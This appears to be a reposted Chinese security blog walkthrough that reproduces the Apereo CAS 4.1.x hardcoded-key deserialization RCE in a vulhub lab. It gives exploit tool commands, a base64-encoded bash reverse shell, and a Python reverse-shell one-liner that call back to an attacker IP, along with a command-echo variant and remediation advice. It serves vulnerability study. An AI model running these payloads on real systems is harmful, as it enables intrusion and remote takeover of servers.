CTF导航 CTF导航

Apereo cas 密钥硬编码反序列化漏洞

渗透技巧 1年前 (2022) admin
492 0 0

最近也是在工作中遇到这个漏洞,之前没接触过,而且这个漏洞也比较老了,是2016年发现的,并且是基于反序列化产生的,所以就打算学习并且做一下复现,如果以后再遇到的时候能够知道该如何分析。


Apereo cas简介

Apereo CAS 单点登陆系统是Java服务器环境下使用较为广泛的单点登陆系统。


CAS 全程Central Authentication Service(中心认证服务),是一个单点登录协议,Apereo CAS是实现该协议的软件包。


单点登录定义


单点登录(Single sign on),英文名称缩写SSO,SSO的意思就是在多系统的环境中,登录单方系统,就可以在不用再次登录的情况下访问相关受信任的系统,也就是说只要登录一次单体系统就可以。


漏洞简介

最早发现此漏洞的文章:


https://apereo.github.io/2016/04/08/commonsvulndisc/


漏洞成因是在4.1.7版本以前一直存在一个默认密钥问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,从而执行任意命令。


Apereo CAS 4.1.X~4.1.6 默认密钥


Apereo CAS 4.1.7~4.2.X KEY随机生成


漏洞利用与复现

Webflow中使用了默认密钥changeit,所以我们就可以利用默认密钥生成序列化对象。


Apereo cas 密钥硬编码反序列化漏洞


环境:安装了vulhub的kali


工具:apereo-cas-attack、burpsuite


Apereo-cas-attaack:使用ysoserial的CommonsCollections4生成加密后的Payload


启动vulhub中的Apereo cas环境


cd /vulhub/apereo-cas/4.1-rce


docker-compose up -d //启动docker环境


Apereo cas 密钥硬编码反序列化漏洞


使用工具生成payload


java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 “touch /tmp/sucess”


Apereo cas 密钥硬编码反序列化漏洞


进入主页并抓包,替换execution


http://192.168.0.112:8080/cas/login


Apereo cas 密钥硬编码反序列化漏洞

Apereo cas 密钥硬编码反序列化漏洞


进入容器,在/tmp目录创建了success文件,说明成功利用


docker exec -it <容器ID> /bin/bash


docker ps -a //查找容器ID,一串字符串的就是ID


Apereo cas 密钥硬编码反序列化漏洞


其他利用方式


①反弹shell,bash -i >& /dev/tcp/ip/port 0>&1,payload如下

java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "bash -c  {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMy83Nzc3IDA+JjE=} | {base64,-d} | {bash,-i}"

(向右滑动,查看更多)

Apereo cas 密钥硬编码反序列化漏洞

Apereo cas 密钥硬编码反序列化漏洞

Apereo cas 密钥硬编码反序列化漏洞


python生成的payload如下,然后直接替换execution后即可反弹成功:


python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.0.3',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);
(向右滑动,查看更多)


②回显与检测


目的:网站所在系统环境无法出网,回显可以直接看到命令执行的返回内容。

使用魔改工具ysoserial-mangguogan-master,Payload如下,然后将编码后的数据替换execution,并且在请求头中添加cmd:whoami等命令,查看回显。

java -jar ysoserial-managguogan-0.0.1-SNAPSHOT-all.jar encode CommonsCollections4

(向右滑动,查看更多)


Apereo cas 密钥硬编码反序列化漏洞

Apereo cas 密钥硬编码反序列化漏洞


参考:反弹shell

 https://www.cnblogs.com/Qixiansheng/p/15474651.html


回显与检测

https://xz.aliyun.com/t/8260?page=5


附:kali的vulhub搭建

https://www.cnblogs.com/lxfweb/p/12952490.html


漏洞危害

任意命令执行



漏洞修复

修改默认密钥


升级Apereo CAS版本


注意:漏洞利用成功响应头回显是500,并且响应体中会有正常的数据。


Apereo cas 密钥硬编码反序列化漏洞

 

Apereo cas 密钥硬编码反序列化漏洞



精彩推荐








Apereo cas 密钥硬编码反序列化漏洞Apereo cas 密钥硬编码反序列化漏洞
Apereo cas 密钥硬编码反序列化漏洞
Apereo cas 密钥硬编码反序列化漏洞

原文始发于微信公众号(FreeBuf):Apereo cas 密钥硬编码反序列化漏洞

版权声明:admin 发表于 2022年11月23日 下午8:14。
转载请注明:Apereo cas 密钥硬编码反序列化漏洞 | CTF导航

相关文章

基于百度OpenRasp的插桩浅析
admin
781
【数据库中间件MyCat的取证】
admin
210
从Apache整体结构入手分析Apache CVE-2021-40438
admin
906
Domain Persistence – AdminSDHolder
admin
977
Hotel check-in terminal bug spews out access codes for guest rooms
admin
15
安全开发之堆分配内存加密
admin
745

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

凭据获取之浏览器
0
实战环境中的Redis 延时注入
0
每日安全动态推送(4-18)
0
漏洞挖掘 | DreamerCMS RCE (CVE-2024-3311)
0
Weblogic RCE(CVE-2024-21006)
0
OpenClinic GA 5.247.01 – Path Traversal (Authenticated)
0
Jenkins 2.441 – Local File Inclusion
0
Catcher(捕手)
0
CVE-2024-2448: Authenticated Command Injection In Progress Kemp LoadMaster
0
PoC Exploit Released for 0-day Windows Kernel Elevation of Privilege Vulnerability (CVE-2024-21338)
0